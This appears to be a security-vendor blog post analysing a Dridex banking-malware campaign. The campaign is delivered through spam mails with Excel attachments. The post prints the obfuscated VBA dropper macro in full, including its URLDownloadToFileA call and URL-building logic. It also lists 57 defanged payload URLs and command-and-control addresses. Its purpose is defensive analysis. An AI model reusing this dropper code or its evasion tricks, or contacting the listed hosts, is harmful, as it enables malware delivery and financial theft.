Dridex, also known as Cridex and Bugat, is a typical info-stealing malware that steals financial information. It is distributed on a massive scale by cybercrime organizations and it mainly uses macros within Microsoft Office Word or Excel document files that are included in spam mails. The most noticeable characteristic of Dridex malware is that it operates by modularizing files depending on features such as downloader, loader, and botnet. As such, there have been cases of ransomwares such as DoppelPaymer or BitPaymer being distributed using Dridex malware. It has been found that the attacker group, which creates and distributes Dridex malware, and the group that distributes ransomware overlap quite significantly judging from the codes and distribution methods.
The ASEC analysis team analyzed how the malware is downloaded from spam mails and Microsoft Office Excel document files. The attacker has been rapidly responding to variants to not get detected by the AV products and used various automatic bypass detection methods.
The collected e-mail was written in English and appears to have targeted global receivers. The title and texts within the document include texts such as ‘Freight Statement Of Outstanding As Of 03_29_2021’ and ‘Ocean Freight overdue invoice Of 03_29_2021,’ disguised as a ‘statement,’ ‘estimate,’ ‘invoice,’ or ‘overdue payment statement.’ These titles are similar to those of spam mails distributed in Korea. The mail had an Excel file attached.
The excel document contains a blurry image which prompts the user to click it. The included images are connected with the VBA macro code. Upon clicking them, the macro code function ‘VIEW_DOCUMENT’ is immediately run. It is not a macro that is automatically run such as Auto_Open, instead, certain area must be clicked in order to be executed. For that reason, it is difficult to run normally in the automated analysis sandbox.
The document also has hidden sheets. The two hidden sheets are XLM macro sheets. The attacker used both VBA and the XLM macro codes. The VBA code refers to the XLM macro code to operate. Such an operation method makes it difficult to find out the features by simply looking at the VBA or XLM macro sheet codes, and detecting based on specific area codes becomes difficult as well.
The attacker made it impossible to check the VBA codes by adding a password on the VBA Project. Tool such as oletools can be used to extract VBA codes, but it is difficult to figure out what the feature is just by looking at the obfuscated codes shown below. The attacker is highly likely to have used VBA Project Locker such as Evilclippy.
#If VBA7 And Win64 Then Private Declare PtrSafe Function line_shipping Lib "urlmon" _ Alias "URLDownloadToFileA" ( _ ByVal pCaller As LongPtr, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As LongPtr, _ ByVal lpfnCB As LongPtr _ ) As Long #Else Private Declare Function line_shipping Lib "urlmon" _ Alias "URLDownloadToFileA" ( _ ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As Long, _ ByVal lpfnCB As Long _ ) As Long #End If Function re_re_order() n = Cells(2, 1): nn = Sheets(2).Cells(2, 1) For u = 1 To Len(n) de = de & Chr(Asc(Mid(n, u, 1)) + Mid(nn, u, 1)) Next re_re_order = de End Function Function next_shipment(cc As Variant) As Variant next_shipment = Split(cc, "" & "--") End Function Function merridians_us() merridians_us = "T1:T3" End Function Sub VIEW_DOCUMENT() Sheets(1).Cells(3, 1).Name = "Line" & "_and" doc_an = Split(re_re_order, "HH" & "HH") P_prints = next_shipment(doc_an(1)) For oo = 0 To UBound(P_prints) - LBound(P_prints) + 1 On Error Resume Next op_price (P_prints(oo)) Run ("Line" & "_and") If oo = 12 Then last_cargo = insure_d: If oo = 14 Then rest_bags = insure_d line_shipping 0, sgs_assure(for_clients_d(Split(doc_an(0), "D" & ","))), last_cargo & "\" & rest_bags, 0, 0 End If Next End Sub Function op_price(jj As String) Sheets(vbNull).Cells(3, 1).value = "=" & jj End Function Function for_clients_d(Mk As Variant) As String Randomize: tg = xlArrangeStyleTiled f = UBound(Mk) + tg for_clients_d = Mk(Int((f) * Rnd)) End Function Function insure_d() insure_d = Sheets(vbNull).Cells(2, 20) End Function Public Function sgs_assure(fg As String) sgs_assure = "ht" & "t" & "p" & "s://" & fg End Function
Upon debugging the VBA macro code, we can see that it is referencing the cell of XLM macro sheet and using it as data. The data is used for the process of creating codes for external URL connection, which are the final feature of the excel document file. A total of 57 URLs are created, and multiple unobfuscations are needed in this process. Below is the list of URLs that the excel file connects to. (Do not connect or download)
After creating the URL list, the document connects to a random address and attempts to download a file. Because there are many addresses that can be connected, the success probability of an attack is high even when some addresses are blocked. The downloaded file is a DLL executable (Portable Executable), but it uses a compressed file extension such as .rar, .tar, or .zip instead of the dll file extension. It is assumed that this extension is used to not to have the file blocked during the suspicious activity detection of downloading an executable. The downloaded file is saved as a fixed DLL file name. These DLL files are Dridex Loader malware.
hxxps://tencoconsulting.com/klcpk3.rar hxxps://abad.tv/gmrgbkv.rar hxxps://nedkellymyanmar.com/l76db8k.rar hxxps://myloanexpert.in/exxuia66v.tar hxxps://aps-scribe.com/ptdgv53.rar hxxps://sivmedia.dk/z18n7do.rar hxxps://14karatvisions.com/rh1trnt.rar hxxps://plataformas.datasiswebcontable.com/ek2lqm2.zip hxxps://reseller.itechbrasil.com/xwpr9m9.tar hxxps://estudiodedanzaesperanzadelosreyes.com/pi4omy.rar hxxps://sadmahfuneralservices.co.za/jke1xnf7b.rar hxxps://engagedmarketingmedia.com/mt42qiyn.rar hxxps://disinfection-cleaning.co.za/sc25xty.zip hxxps://cacaoprojects.com/asse9e3x.rar hxxps://blog.difusodesign.com/vzsfnw3rk.rar hxxps://v2consultores.com/gaiqb3.zip hxxps://sabihasart.com/ltxd9207y.zip hxxps://cpanel.shivay.net/ak5kpl1.zip hxxps://kaptaanchapal.com/hrloamk3.zip hxxps://www.estatebroker.in/cc5qg9x.tar hxxps://thediasporianexperience.com/vh3r0pn.tar hxxps://bioskey.com/w9jii4e1h.rar hxxps://mediawaysnews.com/idn75myb.rar hxxps://community.reimclub.com/ezmumkw.rar hxxps://nxtnet.ga/oszxyd.tar hxxps://aps-sv.com/lse6o3.rar hxxps://masterthedaybook.com/hp8v4p3.rar hxxps://goldenasiacapital.com/pqyxgi.rar hxxps://ist-security.com/nz3wx4.rar hxxps://addictionmusic.in/lloaynxsp.tar hxxps://hchfug.org/oikz5qpn.tar hxxps://gifsnow.fun/jta343i.rar hxxps://preescolarmamagansa.edu.mx/uo0j4ls.rar hxxps://patriotsupremehemp.com/j1jgt4g.rar hxxps://dev.tunepushr.com/s6c1tl.zip hxxps://canadianwork.cc/ugeepbmvc.zip hxxps://cuetzalanlaesencia.com/ehvmx3.tar hxxps://kienology.com/cepzd8r.zip hxxps://elbauldenora.com/yknyy9.tar hxxps://sexologistpakistan.net/e2xlnbik.rar hxxps://cardilicores.com/ak9zjb.zip hxxps://www.bizztradingbot.nl/w1em533ne.tar hxxps://connectcapital.com.br/sum9e8.zip hxxps://www.pkbacademy.ro/hlinx9.tar hxxps://movix.net.br/stwv7a9u.rar hxxps://business2.softberg.ro/knyiq6pg.tar hxxps://rajeshtailang.com/qksnefw1t.tar hxxps://anadelgbt.org/n5gi2o1l9.tar hxxps://www.neslininsayfasi.site/clbqztx8.tar hxxps://erp.nanotechproautocare.com/umxzvfog.rar hxxps://www.mitsuiaccounting.com/nsyii02fi.rar hxxps://drpayalphysiotherapy.in/iuqc13o2.zip hxxps://spiritualroot.org/yqcsymrnj.rar hxxps://robthetoolman.com.au/tni7p1y.zip hxxps://hospedagem.pro/nnkwzi2he.zip hxxps://rajib.pw/twd3dkz41.tar hxxps://citihits.lk/iccdupr.rar
If the file is successfully downloaded, it runs the obfuscated CALL function as shown above. This is a command which runs the downloaded Dridex DLL file using the Regsvr32.exe process. If this process is run, Dridex malware is loaded in the Regsvr32.exe process and operates in the system.
Dridex DLL file operates after going through a very complicated code creation and unpacking process. It repeats memory allocation and deallocation, code injection, and grant execution privilege process to newly create the key loader file PE in memory. The key loader file itself does not have its code changed much. Connecting to the C&C server below is the core feature. The user’s information such as system information is sent in this process.
hxxs://18.104.22.168/ hxxps://22.214.171.124:6601/ hxxps://126.96.36.199/
This blog has introduced how Dridex malware is distributed, starting from the spam mail to the Dridex DLL loader. In the automated sandbox environment, it is difficult to run starting from spam mail to DLL file. Excel and DLL files change their formats quickly, therefore responding with a signature is difficult. AhnLab products detect and block the malware starting from the spam mail distribution to the Dridex DLL file using the following aliases.